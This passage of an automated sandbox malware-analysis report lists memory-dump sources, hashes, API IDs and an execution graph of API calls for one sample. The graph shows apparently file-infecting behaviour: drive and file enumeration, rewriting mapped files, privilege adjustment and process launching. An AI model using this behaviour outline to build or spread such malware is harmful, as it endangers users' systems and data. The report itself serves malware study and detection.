                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                  • String ID:
                                  • API String ID: 2744216297-0
                                  • Opcode ID: 0dffd9b15fc99b7239426327fbc996a62a0077e8a8e2c30642215ceb3654ffb6
                                  • Instruction ID: 3f7d5f4df5bd9d4fba8dc48280b73bd95e99fed7c0e36da81e96227e19b7033c
                                  • Opcode Fuzzy Hash: 0dffd9b15fc99b7239426327fbc996a62a0077e8a8e2c30642215ceb3654ffb6
                                  • Instruction Fuzzy Hash: E1F03036400119BBCF325FD6EC48ECE3F66FB487A1B044050FA8D9A560C63388209BD0
                                  Strings
                                  • unordered_map/set too long, xrefs: 01022F43
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: unordered_map/set too long
                                  • API String ID: 0-306623848
                                  • Opcode ID: 0a799b8f682b269648247401dede6cfee5b00a7a79b03691a242a866a75fd821
                                  • Instruction ID: 34071097d83f19ef7fefca1eed681cd8c9e120c8451dc39094b78d7efa20411a
                                  • Opcode Fuzzy Hash: 0a799b8f682b269648247401dede6cfee5b00a7a79b03691a242a866a75fd821
                                  • Instruction Fuzzy Hash: 9BE1C471A002199FCB19DFACC890AADBBF5FF58310B148369E899DB395D730E951CB90
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00FB844D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: parse error$ror
                                  • API String ID: 2659868963-4201802366
                                  • Opcode ID: aaa6ea8bb8ae413a97a91989cadbccf0e8283be240ab2b41d6fc50ee95cfa208
                                  • Instruction ID: bb307511d0b8b0d7b49e9448014ac5bf43969663d0fd8139890cfe5f808996fe
                                  • Opcode Fuzzy Hash: aaa6ea8bb8ae413a97a91989cadbccf0e8283be240ab2b41d6fc50ee95cfa208
                                  • Instruction Fuzzy Hash: 51C1F271900649CFEB08CF68CC84BEDBB75FF95304F248258E444AB696DB74AA85CF91
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00FB8051
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00FB8060
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: [json.exception.
                                  • API String ID: 4194217158-791563284
                                  • Opcode ID: a556b89add89b31fe5a0a446d85f0dc3426c88e5ea6328dba71e23b6ba433f87
                                  • Instruction ID: db1cfaae98167c17550d512da2f9f3b400c66ce46e194d4a5811a7091419e423
                                  • Opcode Fuzzy Hash: a556b89add89b31fe5a0a446d85f0dc3426c88e5ea6328dba71e23b6ba433f87
                                  • Instruction Fuzzy Hash: 229126309002089FEB18EFA8CC85BEEFBB5FF95314F10425DE440AB691D7B4A984DB91
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00FB3C0F
                                    • Part of subcall function 0108E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0108B17A,?,010E09CC,00000000,?,00000000,-010E65B0), ref: 0108E9CB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionRaise___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::failbit set
                                  • API String ID: 3109751735-1240500531
                                  • Opcode ID: d9183018e58094d64c5fb4ed989be8673b7f288bdc18e0e34c56ba99eae04924
                                  • Instruction ID: 8f0c91b016b5cd7a142b2d0be52f7b8e25d8178544583c5c2aa6ab3a97ac09f3
                                  • Opcode Fuzzy Hash: d9183018e58094d64c5fb4ed989be8673b7f288bdc18e0e34c56ba99eae04924
                                  • Instruction Fuzzy Hash: 4941F671D10608ABD704DF59CC85BEAF7B8EF55320F14822AF9949B641E774AA40CBA1
                                  APIs
                                    • Part of subcall function 0108E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0108B17A,?,010E09CC,00000000,?,00000000,-010E65B0), ref: 0108E9CB
                                  • ___std_fs_directory_iterator_open@12.LIBCPMT ref: 00FB644F
                                  • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00FB646A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionRaise___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
                                  • String ID: exists
                                  • API String ID: 1297148070-2996790960
                                  • Opcode ID: 43bdbc97545bf99e333a976d28a140fc62c6e8cd50cbda5af20037955df51ad2
                                  • Instruction ID: 8cab03459a00a9a43c494b63066c17dfe87239eddbfaaa6d213787eecebc373f
                                  • Opcode Fuzzy Hash: 43bdbc97545bf99e333a976d28a140fc62c6e8cd50cbda5af20037955df51ad2
                                  • Instruction Fuzzy Hash: 6941CF72900604ABCB10DF5ACD81BEAB7B8FB44720F144269EC55A7780EB796914DAE1
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 01024E29
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 01024E42
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 0102594D
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 01025966
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: value
                                  • API String ID: 4194217158-494360628
                                  • Opcode ID: 9c10774b7708d90e92de8c2ae4455c54ad826659003efd8deb7432852168198f
                                  • Instruction ID: 4014e0befe24dcf12bd7a0494db4acc39da276fc0083b7ff80289c2beaf76fc9
                                  • Opcode Fuzzy Hash: 9c10774b7708d90e92de8c2ae4455c54ad826659003efd8deb7432852168198f
                                  • Instruction Fuzzy Hash: 0C51DEB0D04258DBEB14DFA4CC88BDEBBB4BF15304F144259E485AB381DB746A88CB55
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 010299F1
                                  Strings
                                  • type must be boolean, but is , xrefs: 01029AE2
                                  • type must be string, but is , xrefs: 01029A58
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID: type must be boolean, but is $type must be string, but is
                                  • API String ID: 118556049-436076039
                                  • Opcode ID: 45c2d4a2654ffa04de8f4a8494abe9257a75177a40075bc2316a69c2f850b96a
                                  • Instruction ID: a4d538f485a74df1cb8f9229f668525e7dbe731a848a5a660e632d5f3b75db3b
                                  • Opcode Fuzzy Hash: 45c2d4a2654ffa04de8f4a8494abe9257a75177a40075bc2316a69c2f850b96a
                                  • Instruction Fuzzy Hash: D93190B1900248AFDB04FBA8DC51BDEB7B9EB14314F1002A9F495D7785EF38AA04C792

                                  Execution Graph

                                  Execution Coverage:31.8%
                                  Dynamic/Decrypted Code Coverage:8.9%
                                  Signature Coverage:12.3%
                                  Total number of Nodes:292
                                  Total number of Limit Nodes:12
                                  execution_graph 1006 e66076 1007 e6607b 1006->1007 1011 e660c7 1006->1011 1009 e660b0 VirtualAlloc 1007->1009 1007->1011 1013 e661b2 1007->1013 1008 e6615f VirtualFree 1008->1011 1009->1011 1010 e66198 VirtualFree 1010->1013 1011->1008 1011->1010 1012 e660d5 VirtualAlloc 1011->1012 1012->1011 1014 e66389 VirtualProtect 1013->1014 1019 e662fb 1013->1019 1018 e663b7 1014->1018 1015 e663fc VirtualProtect 1016 e66418 1015->1016 1017 e663e7 VirtualProtect 1017->1015 1017->1018 1018->1015 1018->1017 1020 e614e1 1021 e61541 1020->1021 1022 e614fd GetModuleHandleA 1020->1022 1025 e61573 1021->1025 1027 e61549 1021->1027 1023 e61512 1022->1023 1024 e6151a VirtualQuery 1022->1024 1023->1021 1024->1023 1031 e61638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1025->1031 1028 e61566 1027->1028 1048 e61af9 1027->1048 1029 e61579 ExitProcess 1032 e6167f 1031->1032 1033 e6167a 1031->1033 1054 e61718 GetSystemTimeAsFileTime 1032->1054 1066 e6139f GetVersionExA 1033->1066 1036 e61686 1037 e616ca 1036->1037 1040 e616a0 CreateThread 1036->1040 1038 e616d7 1037->1038 1039 e616d0 1037->1039 1042 e6170f 1038->1042 1043 e616dd lstrcpy 1038->1043 1087 e61581 1039->1087 1059 e62c48 memset 1040->1059 1303 e61099 1040->1303 1042->1029 1043->1029 1047 e61718 3 API calls 1047->1037 1049 e61b11 1048->1049 1050 e61b09 1048->1050 1052 e61b16 CreateThread 1049->1052 1053 e61b0f 1049->1053 1051 e61638 188 API calls 1050->1051 1051->1053 1052->1053 1322 e61638 189 API calls 1052->1322 1053->1028 1055 e61754 1054->1055 1056 e61735 SHSetValueA 1054->1056 1057 e6175a SHGetValueA 1055->1057 1058 e61786 __aulldiv 1055->1058 1056->1058 1057->1058 1058->1036 1093 e61973 PathFileExistsA 1059->1093 1062 e62cb2 1064 e62cbb VirtualFree 1062->1064 1065 e616ba WaitForSingleObject 1062->1065 1063 e62c8f CreateThread WaitForMultipleObjects 1063->1062 1115 e62b8c memset GetLogicalDriveStringsA 1063->1115 1064->1065 1065->1047 1067 e613cf LookupPrivilegeValueA 1066->1067 1068 e614da 1066->1068 1069 e613e7 1067->1069 1070 e613ef 1067->1070 1068->1032 1283 e6119f GetCurrentProcess OpenProcessToken 1069->1283 1070->1068 1288 e6120e GetModuleHandleA GetProcAddress 1070->1288 1076 e61448 GetCurrentProcessId 1076->1068 1077 e61457 1076->1077 1077->1068 1078 e61319 3 API calls 1077->1078 1079 e6147f 1078->1079 1080 e61319 3 API calls 1079->1080 1081 e6148e 1080->1081 1081->1068 1082 e61319 3 API calls 1081->1082 1083 e614b4 1082->1083 1084 e61319 3 API calls 1083->1084 1085 e614c3 1084->1085 1086 e61319 3 API calls 1085->1086 1086->1068 1302 e6185b GetSystemTimeAsFileTime srand rand srand rand 1087->1302 1089 e61592 wsprintfA wsprintfA lstrlen CreateFileA 1090 e61633 1089->1090 1091 e615fb WriteFile CloseHandle 1089->1091 1090->1042 1091->1090 1092 e6161d ShellExecuteA 1091->1092 1092->1090 1094 e619a0 1093->1094 1110 e61ac7 1093->1110 1095 e619af CreateFileA 1094->1095 1096 e619c4 Sleep 1095->1096 1097 e61a28 GetFileSize 1095->1097 1096->1095 1098 e619d5 1096->1098 1099 e61a80 1097->1099 1100 e61a38 1097->1100 1114 e6185b GetSystemTimeAsFileTime srand rand srand rand 1098->1114 1101 e61a96 1099->1101 1102 e61a8d FindCloseChangeNotification 1099->1102 1100->1099 1104 e61a3d VirtualAlloc 1100->1104 1105 e61a9c DeleteFileA 1101->1105 1106 e61aad 1101->1106 1102->1101 1104->1099 1108 e61a53 1104->1108 1105->1106 1106->1110 1113 e61ab8 VirtualFree 1106->1113 1107 e619da wsprintfA CopyFileA 1107->1097 1111 e61a0d CreateFileA 1107->1111 1108->1099 1112 e61a59 ReadFile 1108->1112 1110->1062 1110->1063 1111->1097 1111->1105 1112->1099 1112->1108 1113->1110 1114->1107 1116 e62bc8 1115->1116 1117 e62c09 WaitForMultipleObjects 1115->1117 1118 e62bfa lstrlen 1116->1118 1121 e62bd2 GetDriveTypeA 1116->1121 1122 e62be3 CreateThread 1116->1122 1119 e62c3c 1117->1119 1120 e62c2a CreateThread 1117->1120 1118->1116 1118->1117 1120->1119 1126 e62845 1120->1126 1121->1116 1121->1118 1122->1118 1123 e62b7d 1122->1123 1136 e629e2 memset wsprintfA 1123->1136 1273 e6274a memset memset SHGetSpecialFolderPathA wsprintfA 1126->1273 1128 e62878 DeleteFileA 1129 e6288c VirtualFree 1128->1129 1130 e6289a 1128->1130 1129->1130 1131 e628a4 CloseHandle 1130->1131 1132 e628ab 1130->1132 1131->1132 1133 e62692 8 API calls 1134 e62853 1133->1134 1134->1128 1134->1133 1135 e6239d 186 API calls 1134->1135 1135->1134 1137 e62abc memset memset FindFirstFileA 1136->1137 1138 e62a3a memset lstrlen lstrcpyn strrchr 1136->1138 1150 e628b8 memset wsprintfA 1137->1150 1138->1137 1139 e62a88 1138->1139 1139->1137 1141 e62a9a lstrcmpiA 1139->1141 1143 e62b74 1141->1143 1144 e62aad lstrlen 1141->1144 1144->1137 1144->1141 1145 e62b61 FindNextFileA 1146 e62b23 1145->1146 1147 e62b6d FindClose 1145->1147 1148 e62b35 lstrcmpiA 1146->1148 1149 e628b8 174 API calls 1146->1149 1147->1143 1148->1146 1148->1147 1149->1145 1151 e62905 1150->1151 1156 e62951 memset 1150->1156 1152 e62956 strrchr 1151->1152 1153 e6291b memset wsprintfA 1151->1153 1151->1156 1155 e62967 lstrcmpiA 1152->1155 1152->1156 1154 e629e2 180 API calls 1153->1154 1154->1156 1157 e6297a 1155->1157 1158 e62988 lstrcmpiA 1155->1158 1156->1145 1168 e61e6e 1157->1168 1158->1156 1159 e62994 1158->1159 1161 e629ad strstr 1159->1161 1162 e629a5 lstrcpy 1159->1162 1163 e629d3 1161->1163 1164 e629cb 1161->1164 1162->1161 1233 e62692 1163->1233 1211 e6239d strstr 1164->1211 1169 e61e7d 1168->1169 1242 e61df6 strrchr 1169->1242 1172 e62332 1176 e62346 1172->1176 1177 e6233d UnmapViewOfFile 1172->1177 1173 e61eb0 SetFileAttributesA CreateFileA 1173->1172 1174 e61edf 1173->1174 1247 e61915 1174->1247 1179 e62350 1176->1179 1180 e6234b FindCloseChangeNotification 1176->1180 1177->1176 1181 e62356 CloseHandle 1179->1181 1182 e62391 1179->1182 1180->1179 1181->1182 1182->1156 1183 e61f2e 1183->1172 1253 e61c81 1183->1253 1187 e61f92 1188 e61c81 2 API calls 1187->1188 1189 e61f9f 1188->1189 1189->1172 1190 e61af9 169 API calls 1189->1190 1191 e62024 1189->1191 1195 e61fc0 1190->1195 1191->1172 1192 e61af9 169 API calls 1191->1192 1193 e6207a 1192->1193 1194 e61af9 169 API calls 1193->1194 1199 e62090 1194->1199 1195->1172 1195->1191 1196 e61af9 169 API calls 1195->1196 1197 e61ffe 1196->1197 1198 e62013 FlushViewOfFile 1197->1198 1198->1191 1200 e620bb memset memset 1199->1200 1201 e620f5 1200->1201 1202 e61c81 2 API calls 1201->1202 1204 e621de 1202->1204 1203 e62226 memcpy UnmapViewOfFile CloseHandle 1258 e61b8a 1203->1258 1204->1203 1206 e6226e 1266 e6185b GetSystemTimeAsFileTime srand rand srand rand 1206->1266 1208 e622ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1209 e61915 3 API calls 1208->1209 1210 e6231f FindCloseChangeNotification 1209->1210 1210->1172 1212 e62451 CreateFileA GetFileSize 1211->1212 1217 e623d8 1211->1217 1213 e62675 CloseHandle 1212->1213 1214 e62480 1212->1214 1215 e6267c RemoveDirectoryA 1213->1215 1214->1213 1218 e62499 1214->1218 1216 e62687 1215->1216 1216->1156 1217->1212 1217->1216 1219 e61915 3 API calls 1218->1219 1220 e624a4 9 API calls 1219->1220 1268 e6189d memset CreateProcessA 1220->1268 1223 e6255c Sleep memset wsprintfA 1224 e629e2 163 API calls 1223->1224 1225 e62597 memset wsprintfA Sleep 1224->1225 1226 e6189d 6 API calls 1225->1226 1227 e625e4 Sleep CreateFileA 1226->1227 1228 e61915 3 API calls 1227->1228 1229 e62610 CloseHandle 1228->1229 1229->1215 1230 e6261e 1229->1230 1230->1215 1231 e62641 SetFilePointer WriteFile 1230->1231 1231->1215 1232 e62667 SetEndOfFile 1231->1232 1232->1215 1234 e626b2 WaitForSingleObject 1233->1234 1235 e626a2 CreateEventA 1233->1235 1236 e626c1 lstrlen ??2@YAPAXI 1234->1236 1237 e62708 1234->1237 1235->1234 1238 e62736 SetEvent 1236->1238 1239 e626da lstrcpy 1236->1239 1237->1238 1241 e62718 lstrcpy ??3@YAXPAX 1237->1241 1238->1156 1240 e626f1 1239->1240 1240->1238 1241->1240 1243 e61e62 1242->1243 1244 e61e13 lstrcpy strrchr 1242->1244 1243->1172 1243->1173 1244->1243 1245 e61e40 lstrcmpiA 1244->1245 1245->1243 1246 e61e52 lstrlen 1245->1246 1246->1243 1246->1245 1248 e61928 1247->1248 1251 e61924 SetFilePointer CreateFileMappingA MapViewOfFile 1247->1251 1249 e6192e memset GetFileTime 1248->1249 1250 e6194f 1248->1250 1249->1251 1250->1251 1252 e61954 SetFileTime 1250->1252 1251->1172 1251->1183 1252->1251 1254 e61c9c 1253->1254 1256 e61c94 1253->1256 1255 e61cae memset memset 1254->1255 1254->1256 1255->1256 1256->1172 1257 e6185b GetSystemTimeAsFileTime srand rand srand rand 1256->1257 1257->1187 1260 e61b93 1258->1260 1267 e6185b GetSystemTimeAsFileTime srand rand srand rand 1260->1267 1261 e61bca srand 1262 e61bd8 rand 1261->1262 1263 e61c08 1262->1263 1263->1262 1264 e61c29 memset memcpy lstrcat 1263->1264 1264->1206 1266->1208 1267->1261 1269 e618e0 CloseHandle WaitForSingleObject 1268->1269 1270 e6190c 1268->1270 1271 e61907 CloseHandle 1269->1271 1272 e618fb GetExitCodeProcess 1269->1272 1270->1215 1270->1223 1271->1270 1272->1271 1282 e6185b GetSystemTimeAsFileTime srand rand srand rand 1273->1282 1275 e627b5 wsprintfA CopyFileA 1276 e62840 1275->1276 1277 e627de wsprintfA 1275->1277 1276->1134 1278 e61973 17 API calls 1277->1278 1279 e6280f 1278->1279 1280 e62813 DeleteFileA 1279->1280 1281 e62820 CreateFileA 1279->1281 1280->1281 1281->1276 1282->1275 1284 e611c6 AdjustTokenPrivileges 1283->1284 1285 e61200 CloseHandle 1283->1285 1286 e611f6 1284->1286 1287 e611f7 CloseHandle 1284->1287 1285->1070 1286->1287 1287->1285 1289 e61310 1288->1289 1290 e6123f GetCurrentProcessId OpenProcess 1288->1290 1289->1068 1297 e61319 1289->1297 1290->1289 1294 e61262 1290->1294 1291 e612b0 VirtualAlloc 1291->1294 1296 e612b8 1291->1296 1292 e612f1 CloseHandle 1292->1289 1293 e61302 VirtualFree 1292->1293 1293->1289 1294->1291 1294->1292 1295 e61296 VirtualFree 1294->1295 1294->1296 1295->1291 1296->1292 1298 e6134a 1297->1298 1299 e6132a GetModuleHandleA GetProcAddress 1297->1299 1300 e61351 memset 1298->1300 1301 e61363 1298->1301 1299->1298 1299->1301 1300->1301 1301->1068 1301->1076 1302->1089 1304 e61196 1303->1304 1305 e610ba 1303->1305 1305->1304 1321 e6185b GetSystemTimeAsFileTime srand rand srand rand 